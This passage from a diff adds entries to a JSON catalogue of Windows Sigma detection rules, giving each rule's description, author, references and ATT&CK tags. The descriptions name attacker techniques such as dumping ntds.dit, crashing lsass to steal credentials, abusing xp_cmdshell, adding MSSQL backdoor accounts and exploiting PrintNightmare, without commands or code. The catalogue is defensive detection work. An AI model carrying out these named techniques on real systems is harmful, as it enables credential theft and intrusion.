"8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" + }, + { + "description": "Detects common NTLM brute force device names", + "meta": { + "author": "Jerry Shockley '@jsh0x'", + "creation_date": "2022/02/02", + "falsepositive": [ + "Systems with names equal to the spoofed ones used by the brute force tools" + ], + "filename": "win_susp_ntlm_brute_force.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.varonis.com/blog/investigate-ntlm-brute-force", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "value": "NTLM Brute Force" + }, + { + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/08", + "falsepositive": [ + "Legacy hosts" + ], + "filename": "win_susp_ntlm_auth.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "value": "NTLM Logon" + }, + { + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "meta": { + "author": "James Pemberton", + "creation_date": "2020/05/22", + "falsepositive": [ + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." + ], + "filename": "win_susp_ntlm_rdp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "n/a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "value": "Potential Remote Desktop Connection to Non-Domain Host" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_vul_cve_2020_0688.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", + "value": "CVE-2020-0688 Exploitation via Eventlog" + }, + { + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/09/01", + "falsepositive": [ + "Legitimate Atera agent installation" + ], + "filename": "win_software_atera_rmm_agent_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" + ], + "tags": [ + "attack.t1219" + ] + }, + "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "value": "Atera Agent Installation" + }, + { + "description": "Detects backup catalog deletions", + "meta": { + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "creation_date": "2017/05/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_backup_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", + "value": "Backup Catalog Deleted" + }, + { + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Other MSI packages for which your admins have used that name" + ], + "filename": "win_vul_cve_2021_41379.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" + }, + { + "description": "Detects MSI package installation from suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + ], + "filename": "win_msi_install_from_susp_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "value": "MSI Installation From Suspicious Locations" + }, + { + "description": "Detects installation of a remote msi file from web.", + "meta": { + "author": "Stamatis Chatzimangou", + "creation_date": "2022/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_msi_install_from_web.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_st0pp3r_/status/1583922009842802689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.t1218.007" + ] + }, + "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "value": "MSI Installation From Web" + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse_susp_location.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", + "value": "Dump Ntds.dit To Suspicious Location" + }, + { + "description": "This detection method points out highly relevant Antivirus events", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2017/02/19", + "falsepositive": [ + "Some software piracy tools (key generators, cracks) are classified as hack tools" + ], + "filename": "win_av_relevant_match.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", + "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", + "value": "Relevant Anti-Virus Event" + }, + { + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Legitimate use of the feature by administrators (rare)" + ], + "filename": "win_mssql_sp_procoption_set.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "value": "MSSQL SPProcoption Set" + }, + { + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate backup operation/creating shadow copies" + ], + "filename": "win_esent_ntdsutil_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", + "https://twitter.com/mgreen27/status/1558223256704122882", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "value": "Ntdsutil Abuse" + }, + { + "description": "An application has been removed. Check if it is critical.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_builtin_remove_application.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", + "value": "Application Uninstalled" + }, + { + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/09", + "falsepositive": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "filename": "win_susp_msmpeng_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ] + }, + "uuid": "6c82cf5c-090d-4d57-9188-533577631108", + "value": "Microsoft Malware Protection Engine Crash" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + ], + "filename": "win_mssql_xp_cmdshell_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", + "value": "MSSQL XPCmdshell Option Change" + }, + { + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/07", + "falsepositive": [ + "Rare legitimate crashing of the lsass process" + ], + "filename": "win_werfault_susp_lsass_credential_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "value": "Potential Credential Dumping Via WER - Application" + }, + { + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "meta": { + "author": "Florian Roth, Zach Mathis", + "creation_date": "2020/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_audit_cve.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://nullsec.us/windows-event-log-audit-cve/", + "https://twitter.com/VM_vivisector/status/1217190929330655232", + "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "value": "Audit CVE Event" + }, + { + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "meta": { + "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "creation_date": "2022/10/09", + "falsepositive": [ + "Legitimate extended stored procedures named maggie" + ], + "filename": "win_mssql_sp_maggie.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "value": "MSSQL Extended Stored Procedure Backdoor Maggie" + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_mssql_xp_cmdshell_audit_log.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "7f103213-a04e-4d59-8261-213dddf22314", + "value": "MSSQL XPCmdshell Suspicious Execution" + }, + { + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "Rare legitimate administrative activity" + ], + "filename": "win_mssql_add_sysadmin_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", + "value": "MSSQL Add Account To Sysadmin Role" + }, + { + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/13", + "falsepositive": [ + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + ], + "filename": "win_mssql_disable_audit_settings.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "value": "MSSQL Disable Audit Settings" + }, + { + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/17", + "falsepositive": [ + "Software installation" + ], + "filename": "win_taskscheduler_rare_schtask_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.s0111", + "attack.t1053.005" + ] + }, + "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "value": "Rare Scheduled Task Creations" + }, + { + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_taskscheduler_susp_task_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", + "value": "Suspicious Scheduled Tasks Locations" + }, + { + "description": "Detects plugged/unplugged USB devices", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/09", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_usb_device_plugged.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1200" + ] + }, + "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "value": "USB Device Plugged" + }, + { + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate package hosted on a known and authorized remote location" + ], + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/j00sean/status/1537750439701225472", + "https://twitter.com/nas_bench/status/1539679555908141061", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "value": "Loading Diagcab Package From Remote Path" + }, + { + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/20", + "falsepositive": [ + "Antivirus products" + ], + "filename": "win_codeintegrity_attempted_dll_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1483810148602814466", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "value": "Code Integrity Attempted DLL Load" + }, + { + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_codeintegrity_blocked_driver_load.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "value": "Code Integrity Blocked Driver Load" + }, + { + "description": "Detects blocked load attempts of revoked drivers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_codeintegrity_revoked_driver.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "value": "Block Load Of Revoked Driver" + }, + { + "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "meta": { + "author": "Fabian Franz", + "creation_date": "2022/08/30", + "falsepositive": [ + "Legitimate administrative activity", + "Faulty scripts" + ], + "filename": "win_susp_failed_hidden_share_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" + ], + "tags": [ + "attack.t1021.002", + "attack.lateral_movement" + ] + }, + "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", + "value": "Failed Mounting of Hidden Share" + }, + { + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w", + "creation_date": "2021/06/30", + "falsepositive": [ + "Account fallback reasons (after failed login with specific account)" + ], + "filename": "win_susp_failed_guest_logon.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "value": "Suspicious Rejected SMB Guest Logon From IP" + }, + { + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Packages or applications being legitimately used by users or administrators" + ], + "filename": "win_shell_core_susp_packages_installed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "value": "Suspicious Application Installed" + }, + { + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "meta": { + "author": "mdecrevoisier", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate administrator activity" + ], + "filename": "win_sshd_openssh_server_listening_on_socket.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.004" + ] + }, + "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "value": "OpenSSH Server Listening On Socket" + }, + { + "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", + "creation_date": "2021/06/30", + "falsepositive": [ + "Problems with printer drivers" + ], + "filename": "win_exploit_cve_2021_1675_printspooler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://twitter.com/fuzzyf10w/status/1410202370835898371", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", + "value": "Possible CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MalwareJake/status/1410421967463731200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "value": "CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "meta": { + "author": "Bhabesh Raj, Nasreddine Bencherchali", + "creation_date": "2021/07/05", + "falsepositive": [ + "Administrator might try to disable defender features during testing (must be investigated)" + ], + "filename": "win_defender_tamper_protection_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 